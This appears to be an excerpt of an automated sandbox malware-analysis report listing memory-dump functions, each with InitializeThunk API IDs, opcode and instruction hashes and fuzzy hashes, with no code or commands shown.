                                                • Opcode ID: d92b44e8b56ecbdced5ade8b24e9542c39b161942e430c3878d805ee3e5755c4
                                                • Instruction ID: ec0aac52c7590ad84d37e731bc776fdcef546f1a4795d371c2f0d9a038772b87
                                                • Opcode Fuzzy Hash: d92b44e8b56ecbdced5ade8b24e9542c39b161942e430c3878d805ee3e5755c4
                                                • Instruction Fuzzy Hash: 651136B0800288CFDB10CFA9D488BDEBFF4EF49324F148869D518A7610D374A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286971, Relevance: 2.1, APIs: 1, Instructions: 637libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 961763b296e425b642b3a0de5e2e067f30d6fb679f0f2f95888dbccf04769528
                                                • Instruction ID: 7740a0b894ff5c18a8ad130bc59052cc83102473ef22e7d0ff8b4b4052812acc
                                                • Opcode Fuzzy Hash: 961763b296e425b642b3a0de5e2e067f30d6fb679f0f2f95888dbccf04769528
                                                • Instruction Fuzzy Hash: 95623A74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD51AA3344CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012869B8, Relevance: 2.1, APIs: 1, Instructions: 630libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6700c870a96e93545e8081baf318aebbb21c813202998838cd54f83b23625724
                                                • Instruction ID: 87c720b0e43127b730f1ced07b8dc4f7bb707a506a0253b2004034db5d2ebbfe
                                                • Opcode Fuzzy Hash: 6700c870a96e93545e8081baf318aebbb21c813202998838cd54f83b23625724
                                                • Instruction Fuzzy Hash: 81623A74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD51AA3344CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012869FF, Relevance: 2.1, APIs: 1, Instructions: 623libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3bdf6c2b956353ef03f40373669e37bf01e7d4c387c7902683c21cd9f3625691
                                                • Instruction ID: 0e6060feca4da3cbfc1a11eab052b0d94f2f67f905cc81cac349610228f5d9bc
                                                • Opcode Fuzzy Hash: 3bdf6c2b956353ef03f40373669e37bf01e7d4c387c7902683c21cd9f3625691
                                                • Instruction Fuzzy Hash: 5E524B74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD51AA3344CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286A46, Relevance: 2.1, APIs: 1, Instructions: 616libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 95da8013bd3da446621fc07cb7a702676742d48018377242b36ee886d304ac36
                                                • Instruction ID: 19645720737780d5e57d3c8b4cfd4f386935e275535741000b5ee0142824d69d
                                                • Opcode Fuzzy Hash: 95da8013bd3da446621fc07cb7a702676742d48018377242b36ee886d304ac36
                                                • Instruction Fuzzy Hash: C5524B74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD51AA3344CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286A8D, Relevance: 2.1, APIs: 1, Instructions: 609libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 74bdf412dfe8a274defac51a6f1924e9ae4f43951e112e8154e6e5d3f42cc8da
                                                • Instruction ID: 57278fdd3d47c9c8da7eb9ea8e42c2ab02498860b8cd5dd2871689d243180ab8
                                                • Opcode Fuzzy Hash: 74bdf412dfe8a274defac51a6f1924e9ae4f43951e112e8154e6e5d3f42cc8da
                                                • Instruction Fuzzy Hash: 8E524C74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD51AA3344CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286AD4, Relevance: 2.1, APIs: 1, Instructions: 602libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 957ff74fce219339faade99290b877439cde334eafce939674d25c4109b43264
                                                • Instruction ID: a12eac4081a05eb58f71f28ac55258615f6c040cf50379b0b50243e721a803c7
                                                • Opcode Fuzzy Hash: 957ff74fce219339faade99290b877439cde334eafce939674d25c4109b43264
                                                • Instruction Fuzzy Hash: AD524C74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD51AA3344CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286B1B, Relevance: 2.1, APIs: 1, Instructions: 595libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9055056a380c1bd7c7dccea01d5a41849bc1a6add921a52b69c078e2d6e39840
                                                • Instruction ID: 4e66ff6b622a154678ecd798afe89e411794d27038cff4aba8c54fff0943ccca
                                                • Opcode Fuzzy Hash: 9055056a380c1bd7c7dccea01d5a41849bc1a6add921a52b69c078e2d6e39840
                                                • Instruction Fuzzy Hash: 7F524D74A15228CFDB64EF74C89869DBBB6BF48305F2080EAD51AA3344CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286B62, Relevance: 2.1, APIs: 1, Instructions: 588libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3bde045ecb0fa5204717f8dd009f6db39b1d399190cfce0f516e54de73a43ced
                                                • Instruction ID: d4fcf5aa38fdb6f48b76eec247b3834d899f54f6c4432d7f5dd03e3864266bc5
                                                • Opcode Fuzzy Hash: 3bde045ecb0fa5204717f8dd009f6db39b1d399190cfce0f516e54de73a43ced
                                                • Instruction Fuzzy Hash: 74524D74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD51AA3344CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286BA9, Relevance: 2.1, APIs: 1, Instructions: 581libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1163cd84922211f077c0df2525533f3f172e4c95a9f26c30809e8cd8a2d68ad8
                                                • Instruction ID: 6b2601d512d99972a4807cfd057840228348bc35e31fef2ae6ce34a5ce18b96f
                                                • Opcode Fuzzy Hash: 1163cd84922211f077c0df2525533f3f172e4c95a9f26c30809e8cd8a2d68ad8
                                                • Instruction Fuzzy Hash: AC524D74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD519A3344CB359E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286BF0, Relevance: 2.1, APIs: 1, Instructions: 574libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aeaa5cd5d7fe823523967bc463a92e33522489f36c9238df96cb34ae8c35cc2c
                                                • Instruction ID: 6e83a78df2e7723cd01352720493e31aad6e980398546fe1f78f5635f3a0b29c
                                                • Opcode Fuzzy Hash: aeaa5cd5d7fe823523967bc463a92e33522489f36c9238df96cb34ae8c35cc2c
                                                • Instruction Fuzzy Hash: D5424E74A15228CFDB24EF74C89869DBBB6BF88305F2080EAD519A3344CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286C37, Relevance: 2.1, APIs: 1, Instructions: 567libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c145e4d5de684f753e1ee8128e4f39812ec690aed580b4e636b9d85284b4f25c
                                                • Instruction ID: 1581d679485c570df8044dcf1a39354fe2d0378c0c82cb2af8327116940186ab
                                                • Opcode Fuzzy Hash: c145e4d5de684f753e1ee8128e4f39812ec690aed580b4e636b9d85284b4f25c
                                                • Instruction Fuzzy Hash: E9424E74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD519A3344CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286C7E, Relevance: 2.1, APIs: 1, Instructions: 560libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8b90c4b8fe8b7896e24f1a7fee124a0a033efdc1884ff034f4204c6712ae97c1
                                                • Instruction ID: 9c43bdda8311dbc5a480c220b6029382bd04b85c70fbac48c7cb863fc2292da8
                                                • Opcode Fuzzy Hash: 8b90c4b8fe8b7896e24f1a7fee124a0a033efdc1884ff034f4204c6712ae97c1
                                                • Instruction Fuzzy Hash: B0424E74A15228CFDB24EF74C89869DBBB6BF48305F2080EAD519A3344CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286CC5, Relevance: 2.1, APIs: 1, Instructions: 553libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c84e3ac4501eff6e29404d5847cc5d9841e545408ad966977f82c675887515b4
                                                • Instruction ID: 3cd56f67da9cf301726c62d193fbaf36b164f8a4ee7f65f818fecd66c41a4964
                                                • Opcode Fuzzy Hash: c84e3ac4501eff6e29404d5847cc5d9841e545408ad966977f82c675887515b4
                                                • Instruction Fuzzy Hash: 47425E74A15228CFDB24EF74C89869DBBB6BF88305F2080EAD519A3344CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286D0C, Relevance: 2.0, APIs: 1, Instructions: 546libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 33b32e78b28e84f98607e7781d33fe86c1e86ffb678fb827f1892fb1ba8739bc
                                                • Instruction ID: 01a37fbb06b10df53dd46f4a8c73a73650cb2d667a9fbcc34d9ac887728a6d13
                                                • Opcode Fuzzy Hash: 33b32e78b28e84f98607e7781d33fe86c1e86ffb678fb827f1892fb1ba8739bc
                                                • Instruction Fuzzy Hash: 9A424E74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3344CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286D53, Relevance: 2.0, APIs: 1, Instructions: 539libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 69f9d1f834f5d58979185de04b5f237f57755f8a1d2497d9e2cfe86bcb0811c9
                                                • Instruction ID: 3b39fa63685999780e3d52244d8a283d93993f7a17319d12ca203d252e8b55e4
                                                • Opcode Fuzzy Hash: 69f9d1f834f5d58979185de04b5f237f57755f8a1d2497d9e2cfe86bcb0811c9
                                                • Instruction Fuzzy Hash: 6B424E74A15228CFDB64EF74C89869DBBB6BF48305F2080EAD50AA3354CB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286D9A, Relevance: 2.0, APIs: 1, Instructions: 530libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0b9c3d531df8ab612fc3c0827e0b0babd803534de6fb228ebad89b2bf6f6fb9a
                                                • Instruction ID: 3032f3c200bcc214c53daac8c4ef181952cefad79705bba40f1c9c76c1b0e839
                                                • Opcode Fuzzy Hash: 0b9c3d531df8ab612fc3c0827e0b0babd803534de6fb228ebad89b2bf6f6fb9a
                                                • Instruction Fuzzy Hash: 24424F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3344DB349E85CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286DD8, Relevance: 2.0, APIs: 1, Instructions: 523libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bfdd00f5bb732aeef7dbf814889809d6339c04645ba8d1759ef82734b2e5abd7
                                                • Instruction ID: 2a6f1cdc0b0c21787ec49970788b3643bf7e495c9871223c6c4100906df7bf00
                                                • Opcode Fuzzy Hash: bfdd00f5bb732aeef7dbf814889809d6339c04645ba8d1759ef82734b2e5abd7
                                                • Instruction Fuzzy Hash: EA324F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3344DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286E16, Relevance: 2.0, APIs: 1, Instructions: 518libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b3f5d50cc4f8881abe4200ea6c1284a3a05ed68a4a01397952c0f640ea927d06
                                                • Instruction ID: e51469024f8a6a81d4d311aaa93c24a2c75ffcf0942b9e0e2a84bd6e6e93bc09
                                                • Opcode Fuzzy Hash: b3f5d50cc4f8881abe4200ea6c1284a3a05ed68a4a01397952c0f640ea927d06
                                                • Instruction Fuzzy Hash: D0324F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD519A3344DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286E5D, Relevance: 2.0, APIs: 1, Instructions: 509libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c2262ed7b48bb1dd70d0615c0672a74ce6b22136bfff74d07575e71252b5d39f
                                                • Instruction ID: b9086f95bddd00d1acfad66d8d6a9fdd77f1de54f3548e46232976fc897f83e4
                                                • Opcode Fuzzy Hash: c2262ed7b48bb1dd70d0615c0672a74ce6b22136bfff74d07575e71252b5d39f
                                                • Instruction Fuzzy Hash: B7324F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3354DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286E9B, Relevance: 2.0, APIs: 1, Instructions: 504libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a6d2006471a24bc3d22fb16c712933de3375ef1750f7226467c08a50e63e6fc3
                                                • Instruction ID: 842b9795a6ae3a5a6bb7fab0d09153f16d08c7baa5f7ea19442bdae3cd2981c4
                                                • Opcode Fuzzy Hash: a6d2006471a24bc3d22fb16c712933de3375ef1750f7226467c08a50e63e6fc3
                                                • Instruction Fuzzy Hash: 84324F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286EE2, Relevance: 2.0, APIs: 1, Instructions: 497libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1ce4df3ae08fd551f946dab2dba31ffa78266e222618c0e4c585629a8ba2e634
                                                • Instruction ID: be3068c478e8c020fe8a94afe53631e6b6f6f9311eafe2217c3e619dea21187f
                                                • Opcode Fuzzy Hash: 1ce4df3ae08fd551f946dab2dba31ffa78266e222618c0e4c585629a8ba2e634
                                                • Instruction Fuzzy Hash: 92324F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286F29, Relevance: 2.0, APIs: 1, Instructions: 490libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d60e15a14f71db5db62ebff38e7970359e3809e5981ce9912743838a1e328c3e
                                                • Instruction ID: 0c9d997e2e0a68a3e1049eade1c82cfddc956ed64e34a7ce90729f3898752623
                                                • Opcode Fuzzy Hash: d60e15a14f71db5db62ebff38e7970359e3809e5981ce9912743838a1e328c3e
                                                • Instruction Fuzzy Hash: A8324F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286F70, Relevance: 2.0, APIs: 1, Instructions: 481libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c7f90d1cf16c3c63f02a8d025ec6dc8b010f436c9bdb04b212c1d6d90fd2b007
                                                • Instruction ID: abda47475d8c6ded56e1d2433c23d4825ffa1cb2a1b8129ecb58290df59edd1a
                                                • Opcode Fuzzy Hash: c7f90d1cf16c3c63f02a8d025ec6dc8b010f436c9bdb04b212c1d6d90fd2b007
                                                • Instruction Fuzzy Hash: 68224F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3354DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286FAE, Relevance: 2.0, APIs: 1, Instructions: 476libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 85c2e8eff6059c29ecc938011a1dbb7c725ba5b8bb4cf4d2df8cdbc71eea0c4f
                                                • Instruction ID: 842c6806365172dba653f28c4479da83fec418dd336e71ce0f779df5795ad398
                                                • Opcode Fuzzy Hash: 85c2e8eff6059c29ecc938011a1dbb7c725ba5b8bb4cf4d2df8cdbc71eea0c4f
                                                • Instruction Fuzzy Hash: 33224F74A15228CFDB64EF74C89869DBBB6BF88305F2080EAD509A3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01286FF5, Relevance: 2.0, APIs: 1, Instructions: 469libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e887d627a211962c9f771b6bdda44275a42666393fb5658b7455c691a688bb68
                                                • Instruction ID: 3edfcd93375269772f5198f3632b4da3fa9458eace24ec389a6cce0287bbf191
                                                • Opcode Fuzzy Hash: e887d627a211962c9f771b6bdda44275a42666393fb5658b7455c691a688bb68
                                                • Instruction Fuzzy Hash: 51224F74A15228CFCB64EF74C89869DBBB6BF88305F2080EAD509A3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0128703C, Relevance: 2.0, APIs: 1, Instructions: 462libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6fb52959efabae2f639eee2717377cb9276f0444f079c32119dd0096d69a990
                                                • Instruction ID: b90b666ba3ffe10830c850bd0e880ca28a32737fe57bc711705c528a3171a312
                                                • Opcode Fuzzy Hash: b6fb52959efabae2f639eee2717377cb9276f0444f079c32119dd0096d69a990
                                                • Instruction Fuzzy Hash: F6223F74A15228CFCB64EF74C89869DBBB6BF88305F2080EAD50993754DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01287083, Relevance: 2.0, APIs: 1, Instructions: 455libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 586e34ef85c6e3461b6146d4f8b731cd875ce5d01485336d1def27cf36af7e9a
                                                • Instruction ID: d220ab8a941d97a353a7f751196cdee6dc1061d86f54245191a9214152f58911
                                                • Opcode Fuzzy Hash: 586e34ef85c6e3461b6146d4f8b731cd875ce5d01485336d1def27cf36af7e9a
                                                • Instruction Fuzzy Hash: 72223E74A15228CFCB64EF74C89869DBBB6BF88305F2080E9D50A93754DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012870CD, Relevance: 1.9, APIs: 1, Instructions: 448libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 00a94fb156bd664dc065487457b81aab302c064db32d9177299c1cdc05e6af4d
                                                • Instruction ID: 4ee1676a2f3eafb6210c128d08cd9c43f1cc10429cbd98d5c762669691419007
                                                • Opcode Fuzzy Hash: 00a94fb156bd664dc065487457b81aab302c064db32d9177299c1cdc05e6af4d
                                                • Instruction Fuzzy Hash: 77224E74A15228CFDB64EF74C89869DBBB6BF88305F2080E9D50AA3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01287117, Relevance: 1.9, APIs: 1, Instructions: 441libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 21902f8e80f4fcff194b218d991648f4200e4a745845368999cc3a85884e7626
                                                • Instruction ID: e362c52af15e154cc73b82272d47168ce4350ca60260eb8172c694792e268f01
                                                • Opcode Fuzzy Hash: 21902f8e80f4fcff194b218d991648f4200e4a745845368999cc3a85884e7626
                                                • Instruction Fuzzy Hash: AB123C74A15228CFCB64EF74C89869DBBB6BF88305F2080E9D50AA3754DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01287177, Relevance: 1.9, APIs: 1, Instructions: 430libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 13d7a35538890be535a395b9279b2f68435a244810bf209bfae5089fb4145232
                                                • Instruction ID: 7fda56cc916f513f7481d1f5ad192ffe1c86ba69869328b24a065848d17ed4bf
                                                • Opcode Fuzzy Hash: 13d7a35538890be535a395b9279b2f68435a244810bf209bfae5089fb4145232
                                                • Instruction Fuzzy Hash: BA122B74A15228CFCB64EF74C89869DBBB6BF88305F2080E9D50AA3754DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 012871C1, Relevance: 1.9, APIs: 1, Instructions: 423libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 61206331b77999396e9f8729f24f3e40a2258dd84982a90d0fa9dd51f3faacd3
                                                • Instruction ID: be35f7b853b44dfca057b39fc442eb9cd831a710ff0cf97ff7d22de6e41eed72
                                                • Opcode Fuzzy Hash: 61206331b77999396e9f8729f24f3e40a2258dd84982a90d0fa9dd51f3faacd3
                                                • Instruction Fuzzy Hash: D4122A74A15228CFCB64EF74C89869DBBB6BF88205F2080E9D50AE3754DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0128720B, Relevance: 1.9, APIs: 1, Instructions: 416libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ec11a2747c8d369b99f7cdfbd8471480d39d34922ac2e8a31b37bb17f777815f
                                                • Instruction ID: f651d2e1920b1c7da655b2e3c21d9fa60488d5b26c2d2e4c4c757d385bd03ea7
                                                • Opcode Fuzzy Hash: ec11a2747c8d369b99f7cdfbd8471480d39d34922ac2e8a31b37bb17f777815f
                                                • Instruction Fuzzy Hash: E8123974A15228CFCB64EF74C89869DBBB6BF88205F2080E9D50AE3754DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01287255, Relevance: 1.9, APIs: 1, Instructions: 409libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.14841502855.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 945144e2fc7e88444714ae5701cd3c5a65ddcb1bb6e466d44d0c91d1625af600
                                                • Instruction ID: 0c3cbafe3b43e6360e8b833fd12475c07baedd6f783035c39965dd1838a959b3
                                                • Opcode Fuzzy Hash: 945144e2fc7e88444714ae5701cd3c5a65ddcb1bb6e466d44d0c91d1625af600
                                                • Instruction Fuzzy Hash: E1022874A15228CFCB64EF74C89869DBBB6BF88205F2084E9D50AE3744DB349E85CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0128729F, Relevance: 1.9, APIs: 1, Instructions: 402libraryCOMMON
